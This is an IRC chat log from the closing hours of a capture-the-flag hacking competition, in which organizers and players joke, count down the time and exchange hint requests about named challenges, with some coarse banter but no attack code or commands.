<|x_x|> tokki: http://paste2.org/IIcALYLX
OMG x_x had the whole irc log and yeah I checked it after posting- thanks so much!!! <3 k me savin in bookmarkz ILY Sorry for not noticing
The following irc log was given by Adran- Thx <3
+)Plus, that's the reason the time's gonna get mixed up somewhere in the middle, thx (that's me trying to save logs at the last second)
19:00 #pctf: <+ricky> geobot: banana banana banana banana banana banana banana banana banana banana banana banana banana banana banana banana banana banana banana banana banana banana banana banana
19:00 #pctf: < Guest68736> on web100
19:00 #pctf: < geobot> web100
19:00 #pctf: < Adran> on w
19:00 #pctf: < Hertz> yea works
19:00 #pctf: < Hertz> :D
19:00 #pctf: < sven> i'm about 5' 11"
19:00 #pctf: <+dickoff> world's largest ctf player
19:00 #pctf: < sven> always glad to help!
19:00 #pctf: < geobot> (i'm glad to a team that means like pwn2own/pwnium 0days :p
19:01 #pctf: <+ricky> Only 2 more hours!
19:01 #pctf: <+tylerni7> D:
19:01 #pctf: <+tylerni7> and the top 3 are still in contention!
19:02 #pctf: < AnthraX101> And the last file just opened. Lucky, that :P
19:02 #pctf: < nopple> geobot: ricky cheese ricky cheese ricky cheese ricky cheese ricky cheese ricky cheese ricky cheese ricky cheese
19:02 #pctf: <+ricky> Hahh
19:02 #pctf: <+ricky> Oh wow
19:02 #pctf: <+ricky> Jackshit is out
19:02 #pctf: <+ricky> Go go go
19:02 #pctf: <+ricky> (As if we didn't already have enough challenges)
19:02 #pctf: <+ricky> This will be the last one I believe
19:02 #pctf: <+ricky> Have fnu
19:08 #pctf: < lkwpeter> good question
19:08 #pctf: < lkwpeter> forbidden or allowed ?!
19:09 #pctf: <+tylerni7> it won't work...
19:09 #pctf: <+tylerni7> well
19:09 #pctf: <+tylerni7> you can try
19:10 #pctf: < almac> who can I PM to get a little guidance for kpop?
19:10 #pctf: <+ricky> Aaaany more bronies questions? Someone's got to take the 500 points :-)
19:11 #pctf: < Adran> ricky: what is the answer? =D
19:11 #pctf: <+tylerni7> poop
19:11 #pctf: < Adran> (joking)
19:11 #pctf: <+ricky> The answer is the contents of the key file
19:11 #pctf: < geobot> or the contents of jerkcity
19:11 #pctf: <+tylerni7> geobot: you are the best
19:13 -!- cool_guy [~cool_guy@] has joined #pctf
19:13 #pctf: < wtbw> how long left?
19:14 #pctf: <+cai_> little less than 2 hours
19:14 #pctf: <+ricky> Enough time to hack the Bigson!
19:15 #pctf: <+tylerni7> :P
19:15 #pctf: < johnCool> Well, I've got enough of this :) Thanks you guys it was a great ctf.
19:15 #pctf: <+ricky> Thanks for playing!
19:15 #pctf: < wtbw> ty
19:16 #pctf: < NK_> just to be sure
19:16 #pctf: < halfvollemelk> web100.. i'm logged in as admin, but no admin interface?
19:16 #pctf: < geobot> i am going for bronies 2 logged in physical sports?
19:16 #pctf: < NK_> is the tor service still up ?
19:16 #pctf: <+tylerni7> NK_: :|
19:16 #pctf: <+tylerni7> I will check
19:16 #pctf: <+tylerni7> but...
19:16 #pctf: <+tylerni7> it has been up the entire game
19:16 #pctf: <+houqp_> ninjafish: yes
19:16 #pctf: < NK_> okay :)
19:16 #pctf: <+tylerni7> and like 100 people have asked
19:17 #pctf: <+houqp_> NK_: yes
19:17 #pctf: < NK_> oh
19:17 #pctf: <+ricky> halfvollemelk: There should be a message that tells you what to do next when you login as admin
19:18 #pctf: < NK_> tor is too damn slow
19:18 #pctf: < Zoro> molasses
19:18 #pctf: <+houqp_> NK_: yeah, you need to do something about it
19:18 #pctf: < NK_> okay
19:19 #pctf: < foundation> i have a new feature request for radare2
19:19 #pctf: < NK_> i see
19:19 #pctf: < foundation> fing C++ template debugging support!!!
19:19 #pctf: < Guest68736> hahahaha the video on web100
19:19 #pctf: < Guest68736> xD
19:20 #pctf: < ciliated> any hints on kpop?
19:20 #pctf: < geobot> darn, we should use pm for kpop?
19:22 #pctf: < Zoro> What are the CHANCE tiles for?
19:22 #pctf: <+tylerni7> Zoro: read the rules
19:23 #pctf: <@cai_> apparently i missed one :p
19:23 #pctf: <+tylerni7> :O
19:23 #pctf: < jagger_> 2.5h? and not 1.5?
19:23 #pctf: <+cai_> 1.5
19:23 #pctf: <+cai_> i only updated the cash bonus. i'll update topic again
19:24 -!- mode/#pctf [+o cai_] by ChanServ
19:28 #pctf: <+mserrano> Hi Brooklynt Overflow
19:28 #pctf: <+mserrano> We are glad you had a burger for lunch and it was good
19:28 #pctf: <+dickoff> Brooklynt_Overfl: Where'd you get your burger
19:28 #pctf: <+ricky> We had Indian food for lunch
19:28 #pctf: <+ricky> It was better than your burger
19:28 #pctf: <+tylerni7> ricky: did you get it from the place on craig?
19:28 #pctf: <+ricky> Yup
19:28 #pctf: <+tylerni7> how was it?
19:28 #pctf: <+ricky> Big fan of that place
19:28 #pctf: <+tylerni7> I've never been there
19:28 #pctf: <+tylerni7> not tamarind, righ?
19:28 #pctf: <+ricky> Oh you've got to try it
19:28 #pctf: <+tylerni7> right*
19:29 #pctf: <+ricky> No, Kohli's
19:29 #pctf: <+tylerni7> huh
19:29 #pctf: < zoku> I have ezhp working locally, but not on your server?
19:29 #pctf: <+mserrano> tylerni7: tamarind is super good but way more expensive
19:29 #pctf: <+mserrano> zoku: are you assuming aslr is off
19:29 #pctf: < zoku> yes
19:29 #pctf: <+tylerni7> I went to the old one before they shut down, and it was /ok/
19:29 #pctf: <+mserrano> because that assumption is wrong
19:29 #pctf: < zoku> er, sorry mserrano, no
19:29 #pctf: <+tylerni7> hadn't been to the new one
19:29 #pctf: < zoku> mserrano: it runs on my server with aslr on
19:29 #pctf: < zoku> $ cat /proc/sys/kernel/randomize_va_space
19:29 #pctf: < zoku> 2
19:29 #pctf: <+mserrano> zoku: on some systems aslr does not randomize the relevant thing
19:29 #pctf: <+mserrano> on our system it does
19:29 #pctf: <+mserrano> v0v
19:29 #pctf: < zoku> god damnit
19:29 #pctf: <+tylerni7> oh boy, dragon sector got zfs
19:30 #pctf: <+tylerni7> :O
19:30 #pctf: <+ricky> Uh oh
19:30 #pctf: <+mserrano> The binary running on the server is the same as the one we gave you
19:30 #pctf: <+tylerni7> WHO WILL WIN
19:30 #pctf: <+ricky> Getting cloes again
19:30 #pctf: <+tylerni7> this is so exciting
19:30 #pctf: <+mserrano> and it has been confirmed to work
19:30 #pctf: <+mserrano> MUCH EXCITE
19:30 #pctf: <+mserrano> SUCH WOW
19:30 #pctf: <+ricky> I think whoever hacks the Bigson will win
19:30 #pctf: <+mserrano> VERY FLAGE
19:30 #pctf: < geobot> teh flage is not poop
19:30 #pctf: <+mserrano> MANY CTF
19:30 #pctf: <+ricky> So you should all drop everything and go hack the Bigson
19:30 #pctf: <+frozencemetery> worship the old norse gods!
19:30 #pctf: <+tylerni7> geobot: that's not even true!
19:30 #pctf: < geobot> not even tried to determine who gets to you might be stuck on some inconsistencies in windows but works
19:30 #pctf: <+dickoff> geobot: don't leak flags in channel please
19:30 #pctf: < clockish> geobot: you lie!
19:30 #pctf: <+ricky> geobot: banana
19:31 #pctf: <+mserrano> geobot: banana
19:31 #pctf: <+houqp_> geobot: banana
19:31 #pctf: < clockish> geobot: banana banana banana banana banana banana
19:31 #pctf: <+cai_> geobot: banana
19:31 #pctf: <+dickoff> I like bananas
19:31 #pctf: < wtbw> O_o
19:31 #pctf: <+frozencemetery> geobot: bananananananabatman
19:31 #pctf: < clockish> banana banana banana banana banana banana
19:31 #pctf: <+houqp_> geobot: poopnana
19:31 #pctf: <+dickoff> he's too clever for us
19:32 #pctf: < KT> lol :)
19:32 -!- copyleft_ [~copyleft@] has joined #pctf
19:33 #pctf: <+ricky> You can hack the Bigson from a mobile device - isn't web awesome?
19:33 -!- sweet_potatoes [~sweet_pot@] has joined #pctf
19:33 #pctf: < Thordenm> ricky: but can you do it with punchcards?
19:34 #pctf: < sweet_potatoes> any hint for web200 (javascript one) :/ ?
19:34 #pctf: < oceanx> banananaaaaa
19:34 #pctf: < sweet_potatoes> lolz
19:34 #pctf: < sweet_potatoes> oceanx: sexy ?
19:34 #pctf: < sigsegv_> any hints on stego?
19:34 #pctf: < geobot> i'm done according to organizers told us hints
19:34 #pctf: <+tylerni7> sigsegv_: the flag is INSIDE THE COMPUTER
19:34 #pctf: < inter> tylerni7: NO THE FLAG IS IN YOUR MIND
19:35 #pctf: < inter> SO YOU TELL; ME
19:35 #pctf: < Zerith> where do I enter a key for Misc ? :\
19:35 #pctf: < geobot> just enter the r_netsec folks
19:35 #pctf: < Zerith> oops
19:35 #pctf: < Zerith> ignore dat
19:35 #pctf: <+mserrano> Zerith: same place you enter any key
19:35 #pctf: <+mserrano> lol
19:35 #pctf: <+frozencemetery> i,i bend over and I'll show you
19:35 #pctf: < inter> you shouldve
19:35 #pctf: < inter> named the multiplication question "multiplication is gay"
19:36 #pctf: <+frozencemetery> yeah that's not happening inter.
19:36 #pctf: < _blasty_> ok
19:36 #pctf: < Pitr_> wrong. gay multiplication is an oxymoron amongst almost all species.
19:36 #pctf: < `Peluche> For chall graphs (crypto 200), when we got the message, do we have to do something next with the message or the message is the flag ?
19:37 #pctf: <+mserrano> `Peluche: the message is the flag
19:37 #pctf: < geobot> geobot can always know who own the message someone about 5 hours
19:37 #pctf: <+mserrano> but you can decode the number into text
19:39 #pctf: < `Peluche> mserrano: ok. thanks, so I guess I don't have the good number ^^
19:39 #pctf: < HeartLESS_> who is not busy? Have a question about web100
19:39 #pctf: < geobot> re200 runned correctly but not the video on web100 please?
19:40 #pctf: < HeartLESS_> ricky, I`ve wrote you pm
19:40 #pctf: < inter> tylerni7 is watching ponies, so hes not busy HeartLESS_
19:40 #pctf: < HeartLESS_> written*
19:40 #pctf: <+cai_> HeartLESS_: you can pm me
19:43 -!- Gut_ [uid24602@gateway/web/irccloud.com/x-lpojyjxhyocewncw] has joined #pctf
19:44 #pctf: < zoku> I've been working on ezhp all weekend and it works on all my systemmss, I just wanna scoree!
19:44 -!- bs` [~bs@gateway/tor-sasl/bs/x-48276796] has joined #pctf
19:44 #pctf: <+ricky> zoku: So you have a shell on one of our systems right
19:44 #pctf: <+ricky> Via the sass problem
19:44 #pctf: <+ricky> See if you can make it work on our system
19:45 #pctf: < sven> asking for a friend: what if i root that system to grab the flag? :-P
19:45 #pctf: < geobot> grats stratum auhuur for the web100 flag?
19:46 #pctf: <+tylerni7> sven: hmm ricky what do you think?
19:46 #pctf: <+tylerni7> sven: I'm not sure how much it'll help :P
19:46 #pctf: < geobot> it'll be done this year
19:46 #pctf: < _blasty_> DO WE BURN 0DAY YES NO ?
19:47 #pctf: <+mserrano> _blasty_: you... definitely do not have to
19:47 #pctf: < iago-x86> blackops: obviously
19:47 #pctf: < iago-x86> DOL IT
19:47 #pctf: < iago-x86> DO IT
19:47 #pctf: <+mserrano> _blasty_: you should solve bronies2 though
19:47 #pctf: <+mserrano> you can do it
19:47 #pctf: <+mserrano> I believe in you
19:47 #pctf: <+cai_> _blasty_: you could, and include that in your writeup
19:47 #pctf: <+tylerni7> xD
19:47 #pctf: <+mserrano> pls include full 0day in writeup
19:47 #pctf: <+dickoff> _blasty_: is it worth 4k? :)
19:47 #pctf: <+mserrano> 8k*
19:47 #pctf: < clockish> _blasty_: will trade 0-days 4 flags
19:47 #pctf: <+mserrano> or I guess 4k, yeah
19:47 #pctf: <+tylerni7> mserrano: well 1st vs 2nd
19:49 #pctf: <+cai_> man, it's gonna be a huge pain to do a write-up for the ctf.. lol 30 something problems
19:49 #pctf: <+cai_> good luck..
19:49 #pctf: <+ricky> Hehe
19:49 #pctf: <+ricky> Didn't think of that :-)
19:49 #pctf: <+ricky> I see that the bigson is crashing
19:49 #pctf: <+ricky> This is a great sign :-)
19:50 #pctf: < sven> who would make that poor thing crash? :-(
19:50 #pctf: < spq> ricky: can we ask something about web800?
19:50 #pctf: <+ricky> spq: Sure thing
19:50 #pctf: <+mserrano> spq: ask away, you may not get a good answer :P
19:51 #pctf: < iago-x86> Luckily, I only solved a few. Easy to make writeup! :)
19:51 #pctf: <+tylerni7> iago-x86: writeup is just for cash prizes :)
19:51 #pctf: <+ricky> Shhh don't tell him that!
19:51 #pctf: < marcoscars02> xD
19:51 #pctf: <+mserrano> although we would be happy if you wrote writeups anyway :P
19:52 #pctf: < marcoscars02> tylerni7, or to fill a blog
19:52 #pctf: < marcoscars02> XD
19:52 #pctf: <+tylerni7> otherwise we'll kill you
19:52 #pctf: < clockish> yeah, everyone should do writeups!
19:52 #pctf: < clockish> democratize hacking!
19:52 #pctf: <+tylerni7> clockish: keep hacking elite!
19:52 #pctf: <+mserrano> unless you're tomcr00se in which case no writeups
19:52 #pctf: <+mserrano> in order to keep hacking elite
19:52 #pctf: <+frozencemetery> s/democratize/demoralize/ <-- for the way I read it first
19:52 #pctf: < clockish> tylerni7: up with the proletariat
19:52 #pctf: < poppopret> why does tomcr00se not write writeups?
19:52 #pctf: < inter> cuz he has swag
19:52 #pctf: <+tylerni7> poppopret: he wants to keep hacking elite
19:52 #pctf: <+mserrano> efn
19:52 #pctf: <+tylerni7> poppopret: also he's kind of a dick
19:52 #pctf: <+mserrano> efb*
19:53 #pctf: <+tylerni7> tomcr00se: <3
19:53 #pctf: <+mserrano> 70min to go
19:53 #pctf: <+mserrano> 67*
19:53 -!- mode/#pctf [-o cai_] by ChanServ
19:53 #pctf: <+mserrano> go go go 0xffa/ds/mslc/etc
19:54 #pctf: < clockish> tylerni7: note that we're not exactly great about writeups, either...
19:54 #pctf: <+ricky> Hey when we're required to, we write them
19:54 #pctf: <+cai_> we will turn off the scoreboard for the last hour
19:54 #pctf: <+cai_> j/k
19:55 #pctf: <+ricky> Half the room was about to turn around and yell at cai_
19:55 #pctf: < tokki> lol
19:55 #pctf: <+ricky> (The room we're sitting in)
19:55 #pctf: <+mserrano> naw we shoulda turned it off like 8 hours before the end
19:55 #pctf: < tokki> lool
19:55 #pctf: <+mserrano> codegate style
19:56 #pctf: < [CISSP]HoLyVieR> for the polygon challenge, was there anything posted about the dictionary we have to brute-force with ? Or just any dictionary should do ?
19:56 #pctf: < sven> pf, it's way more exciting this way :)
19:56 #pctf: <+mserrano> [CISSP]HoLyVieR: wat
19:56 #pctf: <+ricky> So PPP doesn't do stupid password brute forcing challenges
19:56 #pctf: <+ricky> Unless it's a crypto thing where the brute force is reasonable
19:56 #pctf: < clockish> and local
19:56 #pctf: <+ricky> Please note this for the future :-)
19:56 #pctf: < tokki> lol
19:57 #pctf: < [CISSP]HoLyVieR> "They claim bots can no longer attack the website protected by the Polygon Shifter. Do we need to manually bruteforce the credentials?"
19:57 #pctf: < [CISSP]HoLyVieR> that's in the description
19:57 #pctf: <+mserrano> [CISSP]HoLyVieR: if the question ever mentions manual bruteforcing
19:57 #pctf: <+ricky> OK, that's kind of just part of the whole making fun of shapesecurity
19:57 #pctf: <+mserrano> the answer is not manual bruteforcing
19:57 #pctf: <+mserrano> when's the last time you manually bruteforced something
19:57 #pctf: <+mserrano> and enjoyed it
19:57 #pctf: <+ricky> Like it's supposed to be sarcastic
19:57 #pctf: < [CISSP]HoLyVieR> I'm not manually brute-forcing it
19:57 #pctf: < oceanx> lol
19:57 #pctf: <+mserrano> bruteforce is not the answer
19:58 #pctf: < sven> it's a start, though
19:58 #pctf: <+mserrano> not a good one
19:58 #pctf: < sven> never claimed that :)
19:58 #pctf: < foundation> say no to manual bruteforcee!
19:58 #pctf: < tokki> i just had 30mins of manual bruteforcing lol
19:58 #pctf: < Adran> tokki: did that work?
19:58 #pctf: < sven> use automated bruteforce instead. more fun for everyone!
19:58 #pctf: < positron_> how to solve kpop without file write
19:59 #pctf: < tokki> :D YES
19:59 #pctf: < Adran> tokki: *.*
19:59 #pctf: < tokki> positron_: listen to kpops..?
19:59 #pctf: < Adran> ugh
19:59 #pctf: < tokki> *.*
19:59 #pctf: < opxx> how much time left?
19:59 #pctf: < tokki> 1HR
19:59 #pctf: < tokki> 111111
19:59 #pctf: < opxx> damn
20:00 #pctf: < tokki> ikr
20:00 #pctf: < opxx> stil no idwa about that js-web... this one + web800 are the hardest one
20:00 #pctf: < opxx> *idea
20:00 #pctf: < tokki> GOOD LUCK GUYS FOR THE LAST HOUR
20:00 #pctf: <+ricky> web800 is quality enterprise web
20:00 #pctf: < sven> for some value of quality
20:01 #pctf: < opxx> what do u mean by that?
20:01 #pctf: < sven> nothing.
20:01 #pctf: <+ricky> I think 0xffa is about to solve part
20:01 #pctf: <+ricky> 2
20:01 #pctf: < ius> ricky: its not written in java is it
20:01 #pctf: <+ricky> Super super close :-)
20:02 #pctf: < Adran> ricky: i'm presuming you're monitoring the stuff? :P
20:02 #pctf: <+ricky> :-)
20:02 #pctf: <+cai_> Adran: he is :)
20:02 #pctf: < Adran> fun
20:02 #pctf: <+ricky> Anyway, I suspect it's gg after you get that
20:02 #pctf: < tokki> ftw!
20:03 #pctf: <+ricky> Nicely done
20:03 #pctf: <+tylerni7> nicely *almost* done
20:03 #pctf: <+tylerni7> :P
20:03 #pctf: <+ricky> I'm sure it's coming any second now
20:03 #pctf: <+tylerni7> that's what she said
20:03 #pctf: < mathiasbynens> :D
20:03 #pctf: <+mserrano> :D
20:03 #pctf: <+ricky> :-(
20:04 #pctf: < tokki> :D lol
20:06 #pctf: < inter> dude
20:06 #pctf: < inter> i
20:06 #pctf: < inter> i cant
20:06 #pctf: < inter> handle the ponies anymore
20:06 #pctf: < qll> xD
20:06 #pctf: <+ricky> Heheh
20:09 #pctf: < batzig_> for crypto 200 (graphs) does the decrypted number need to be converted to a string to be submitted?
20:09 #pctf: < tokki> my friend's saying he is getting high on ponies
20:09 #pctf: <+tylerni7> batzig_: yes
20:09 #pctf: < WuZ> I have a question for "rendez-vous", which admin can I pm?
20:09 #pctf: < opxx> any hint for halphow2js will be released?
20:10 #pctf: <+mserrano> 50min
20:10 #pctf: < iZsh> i'm about to have a heartattack
20:10 #pctf: < tokki> they're gonna release hints like
20:10 #pctf: * sven too
20:10 #pctf: < tokki> in the last 30 seconds
20:10 #pctf: < opxx> ^^
20:10 #pctf: <+mserrano> lol
20:10 #pctf: * sven can't take the suspense anymore :<
20:10 #pctf: <+mserrano> iZsh / sven: don't die
20:10 #pctf: <+tylerni7> at least not until you solve bronies
20:11 #pctf: < tokki> brownies!
20:12 -!- Beched [6daa088b@gateway/web/freenode/ip.] has joined #pctf
20:12 #pctf: < poppopret> is the polygon challenge supposed to be easy?
20:12 #pctf: <+tylerni7> fairly easy
20:12 #pctf: <+tylerni7> still 100 points though
20:13 #pctf: < deject3d_> for web100, we can assume the password length is what the page says right
20:13 #pctf: < dwn> I want to know how long hudak took mslc/dragon/etc.
20:13 #pctf: < dwn> because apparently I am really bad
20:13 #pctf: < Pitr_> Can someone explain the last step I'm missing in curlcore, in 1 hour? :)
20:13 #pctf: < poppopret> it's giving me an aneurysm
20:13 #pctf: < dwn> yea.
20:13 #pctf: < dwn> i mean it's fun
20:13 #pctf: < tokki> hudak means fast(?) in korean
20:13 #pctf: <+tylerni7> Pitr_: you can pm me... but I may not be able to help
20:13 #pctf: < dwn> but i am gonna take forever
20:14 #pctf: < factoreal> who solve web_200 reekee?
20:14 #pctf: <+tylerni7> factoreal: you can pm me specific questions about it
20:14 #pctf: < Hero2Morow> is parlor down?
20:14 #pctf: <+tylerni7> Hero2Morow: will check
20:14 #pctf: <+tylerni7> Hero2Morow: no
20:15 #pctf: < NK_> tylerni7: are you guys coming to phdays this year ?
20:15 #pctf: <+tylerni7> NK_: I think a few of us are...
20:16 #pctf: < positron_> gimme hints for kpop
20:16 #pctf: < Hero2Morow> cookie
20:16 #pctf: < Hero2Morow> jk i have no clue
20:16 #pctf: < Hero2Morow> jk i have no clue:(
20:16 #pctf: < Hero2Morow> ive been trying to solve it for 2 days :(
20:16 #pctf: < sven> hints are for the weak
20:17 #pctf: < tokki> lol if in any quals someone comes up and asks you for an autograph
20:17 #pctf: < tokki> that'll be me
20:17 #pctf: <+mserrano> < 45 minutes
20:17 #pctf: < sven> fuckfuckfuck
20:17 #pctf: < tokki> *gasp*
20:17 #pctf: <+houqp_> gogogogogo
20:17 #pctf: < architekt> gogoogo
20:17 #pctf: <+houqp_> geobot: gogogogogo
20:17 #pctf: < tokki> gogogogog
20:18 #pctf: <+tylerni7> dragon sector! you still have time!
20:18 #pctf: < Hero2Morow> gooooooooooooooooooo
20:18 #pctf: < tokki> EVERYONE FTW
20:18 #pctf: < inter> what if i told you the real winner is tylerni7
20:18 #pctf: <+tylerni7> you would be wrong
20:18 #pctf: < halfvollemelk> gogogogogo GUYS!
20:18 #pctf: < inter> he spread the bronies around
20:18 #pctf: < inter> infecting normal people
20:19 #pctf: <+ricky> So cloes so close :-)
20:19 #pctf: < Hero2Morow> DRAGON SECTOR JUST GOT POINTS
20:19 #pctf: < Hero2Morow> DAYYYUUUU,
20:19 #pctf: < Hero2Morow> M
20:19 #pctf: < tokki> DAYUMMMMMN
20:19 #pctf: < acez> anyone here for 'jackshit' challenge ?
20:19 #pctf: < Pitr_> thanks tylerni7, I've got one more thing to try
20:19 #pctf: <+ricky> Uh oh
20:19 #pctf: <+tylerni7> ok
20:19 #pctf: <+mserrano> Hero2Morow: u wot m8
20:19 #pctf: < acez> tylerni7: 'jackshit' challenge admin around ?
20:19 #pctf: <+mserrano> acez: ping clockish
20:19 #pctf: < acez> thanks
20:19 #pctf: < clockish> yeah me
20:20 #pctf: < tokki> fuck my itunes just came on
20:20 #pctf: < tokki> and scared the shit out of me
20:21 #pctf: <+mserrano> < 40
20:21 #pctf: < halfvollemelk> gotta go, great CTF! thanks guys
20:22 #pctf: < Hero2Morow> you could fuck with people so hard
20:22 #pctf: <+mserrano> everybody
20:22 #pctf: <+tylerni7> halfvollemelk: thanks for playing!
20:22 #pctf: <+mserrano> ricky's favorite pony
20:22 #pctf: <+mserrano> is Princess Celestia
20:22 #pctf: < Hero2Morow> by solving a good amount fo the problems
20:22 #pctf: < tokki> ooh
20:22 #pctf: < Hero2Morow> but saving the flags for the last 20 minuteds
20:22 #pctf: <+tylerni7> Hero2Morow: yeahh...
20:22 #pctf: < Hero2Morow> and just jump to the top
20:22 #pctf: <+tylerni7> that's called "being a dick"
20:22 #pctf: < acez> btw the ctf ends in 40 minutes ?
20:22 #pctf: <+tylerni7> acez: 38
20:22 #pctf: <+tylerni7> but yeah
20:22 #pctf: <+tylerni7> (as in, on time)
20:22 #pctf: < acez> k thanks
20:23 #pctf: < Sin__> what did you guys do since the start to make the website more responsive ?
20:23 #pctf: < geobot> hadn't been responsive
20:23 #pctf: < tomcr00se> i think i'm too tired for jackshit
20:23 #pctf: <+tylerni7> Sin__: awesie has a writeup about the site
20:23 #pctf: < Sin__> okay, cool
20:23 #pctf: <+tylerni7> it'll get posted after the ctf
20:24 #pctf: < tomcr00se> all looks like best quality code to me
20:24 #pctf: <+mserrano> tomcr00se: jackshit may be broken
20:24 #pctf: <+ricky> tomcr00se: I think 0xffa solved bronies 2 in about 2 hours or less - you can do it in 30 min, right?
20:24 #pctf: <+mserrano> we are checking
20:24 #pctf: < acez> thanks
20:24 #pctf: <+ricky> Solved meaning got super super cloes
20:24 #pctf: <+tylerni7> mserrano: it's /probably not/ broken
20:24 #pctf: <+tylerni7> but it might be
20:25 #pctf: < tomcr00se> mserrano: OMG THATS JACKSHIT
20:25 #pctf: <+ricky> Hahaha
20:25 #pctf: < tomcr00se> i work so hard
20:25 #pctf: < tomcr00se> think i deserve hint for _nightmare_
20:25 #pctf: <+ricky> Oh maybe more like 3 hours, not sure
20:25 #pctf: < ciliated> where the flag is in reekee
20:25 #pctf: <+ricky> Anyway :-)
20:25 #pctf: <+ricky> The flag in reekee is in a file somewhere I believe
20:25 #pctf: < tokki> tomcr00se: they're gonna give the hint 30 seconds before the ctf ends
20:26 #pctf: < oceanx> tomcr00se: everyone deserves a hint for _nightmare_ :P
20:26 #pctf: < geobot> skier_ did you get a hint for _nightmare_
20:26 #pctf: < vladum_> quick question about reekee, please?
20:26 #pctf: <+ricky> vladum_: pm tylerni7
20:26 #pctf: < ciliated> +ricky: at which directory?
20:27 #pctf: <+ricky> ciliated: Not sure what directory, you don't need to know to solve it
20:27 -!- erketu [~erketu@] has joined #pctf
20:27 #pctf: < sdjakl> geobot: ffa hasn't gotten any hints
20:27 #pctf: < geobot> he kinda surprised it hasn't really appreciate your sentiment
20:27 #pctf: * tokki looks at clock looks at clock looks at clock throws clock
20:28 #pctf: < poppopret> is web150 considered easy or hard?
20:28 #pctf: < geobot> what 8 ctfs offer the most realistic data fetch and not a brony, fwiw, i think some of you sobs do you ball so hard?
20:29 #pctf: < comex> geobot: i'm a brony
20:29 #pctf: <+tylerni7> geobot: did you like the site?
20:29 #pctf: <+tylerni7> er
20:29 #pctf: <+tylerni7> comex: *
20:29 #pctf: <+ricky> Did you know all the captchas from memory?
20:29 #pctf: < comex> tylerni7: i was asleep for the actual brony part though :(
20:29 #pctf: <+tylerni7> aww
20:29 #pctf: <+tylerni7> that makes me sad
20:30 #pctf: * ricky whistles
20:30 #pctf: <+tylerni7> comex: yeah, top notch web skillz
20:30 #pctf: < geobot> all 8 users around but nothing that i put into how teams are your skillz at cracking sql dump seem to work with: ctf though -_-
20:30 #pctf: < ryan-c> yay, got parlor
20:31 #pctf: < sdjakl> tylerni7: I swear, the things you made me go through for reekee
20:31 #pctf: < clockish> jackshit updated to remove the stack protector
20:31 #pctf: < sdjakl> tylerni7: (speaking of web skills)
20:31 #pctf: <+dickoff> ANNOUNCE: ---------------- jackshit updated to remove the stack protector --------------------------------
20:31 #pctf: < Beched> huh
20:32 #pctf: < Beched> btw rather nice ctf, i thought it will be worse
20:32 #pctf: < iZsh> meh
20:32 #pctf: < Beched> i mean ppp never makes bad tasks
20:32 #pctf: < zoku> ricky: could you install strace on the nightmare box?
20:32 #pctf: < ius> ricky: reporting in for knowing some PONIES by heart by now
20:32 #pctf: <+tylerni7> sdjakl: :)
20:32 #pctf: <+tylerni7> Beched: haha
20:32 #pctf: < Beched> but they make only PWN
20:32 #pctf: < iZsh> why do you guys change the binary 30min before the end?
20:32 #pctf: < Beched> and now there're various categories
20:32 #pctf: <+tylerni7> iZsh: because we fucked it up
20:32 #pctf: < zoku> ricky: trying to debug my ezhp exploit
20:32 #pctf: <+ricky> Congrats 0xfaa for solving Bronies 2!
20:32 #pctf: < Beched> but lol even in web there's pwn xD
20:32 #pctf: < geobot> we should make only pwn a setuid binary so ida
20:32 #pctf: <+cai_> Grats :)
20:32 #pctf: <+ricky> Nicely done!
20:32 #pctf: < iZsh> yeah but we worked with that :s
20:32 #pctf: < _blasty_> b0w d0wn
20:32 #pctf: < _blasty_> BOW DOWN
20:32 #pctf: <+mserrano> 0xffa: gg :D
20:32 #pctf: <+ricky> Good game
20:32 #pctf: < tokki> I L PolygonShifter
20:32 #pctf: <+mserrano> (for that problem anyway)
20:32 #pctf: < tokki> <3
20:32 #pctf: <+ricky> Sorry for that horrible C++
20:33 #pctf: <+tylerni7> dragon sector! better finish up bronies!
20:33 #pctf: <+tylerni7> :O
20:33 #pctf: < hellman_> gg
20:33 #pctf: < iZsh> meh, i was working on jackshit :s
20:33 #pctf: < wtbw> chronosphere due to discharge after the game is over
20:33 #pctf: <+tylerni7> iZsh: it's basically the same
20:33 #pctf: <+mserrano> iZsh: the problem is the same, just no stack protector
20:33 #pctf: < Beched> иец
20:33 #pctf: < Beched> btw
20:33 #pctf: < ryan-c> who the hell is 0xffa?
20:33 #pctf: < Beched> who are 0xffa ? O_O
20:33 #pctf: < Beched> lol
20:33 #pctf: < tokki> ㅣㅐㅣ
20:34 #pctf: < tokki> lol
20:34 #pctf: < ryan-c> lol
20:34 #pctf: <+tylerni7> heh
20:34 #pctf: < zoku> ricky: any other suggestions?
20:34 #pctf: < ius> do the maths
20:34 #pctf: < ius> it'll check out
20:34 #pctf: <+frozencemetery> have you ever really looked at your hands?
20:34 #pctf: < zoku> ricky: I'm having a hell of a time debugging over a connectback shell with no tools
20:34 #pctf: < ryan-c> tylerni7: parlor was fun, thanks :D
20:34 #pctf: <+tylerni7> :P
20:34 #pctf: <+tylerni7> ryan-c: glad you enjoyed it :)
20:34 #pctf: <+tylerni7> ius: but.. addition is hard
20:34 #pctf: <+tylerni7> much like multiplication
20:34 #pctf: < foundation> no eindbazen this year? i guess they must have forgotten their password ?
20:34 #pctf: < tokki> lol
20:34 #pctf: <+mserrano> no way
20:35 #pctf: < sdjakl> 0xffa = x+y for x,y (in) Z
20:35 #pctf: < Beched> heh
20:35 #pctf: <+mserrano> we email it to them in plaintext
20:35 #pctf: < tokki> lol
20:35 #pctf: < Beched> yeah btw, Eindbazen have gone
20:35 #pctf: < Beched> hm
20:35 #pctf: < ius> x + y = 0xffa, solve for x,y indeed ;)
20:36 #pctf: <+ricky> zoku: I think clockish is installing it now
20:36 #pctf: < ryan-c> tylerni7: is the ctf ending on time, or being extended an hour or two?
20:36 #pctf: < clockish> yeah, I'll do it
20:36 #pctf: <+tylerni7> ryan-c: ending on time
20:36 #pctf: <+dickoff> ryan-c: it is ending in 25 minutes
20:36 #pctf: <+tylerni7> as we have been saying :P
20:36 #pctf: <+tylerni7> it's a 48 hour competition
20:36 #pctf: <+tylerni7> you've all had plenty of time :)
20:36 #pctf: < clockish> zoku: anything else you want?
20:36 #pctf: < wtbw> frozencemetery: woah, I have *fingers*
20:36 #pctf: < Beched> ius
20:36 #pctf: < Beched> i remember you're from eindbazen, aren't you?
20:36 #pctf: < Beched> 0xffa == Eindbazen ??? O__O
20:37 #pctf: <+tylerni7> + ...
20:37 #pctf: <+mserrano> O__O
20:37 #pctf: < tokki> O__O
20:37 #pctf: <+tylerni7> 0xffa > 0xeb
20:37 #pctf: < mathiasbynens> mind = blown
20:37 #pctf: < sdjakl> yeah tylerni7 seems to have gotten it
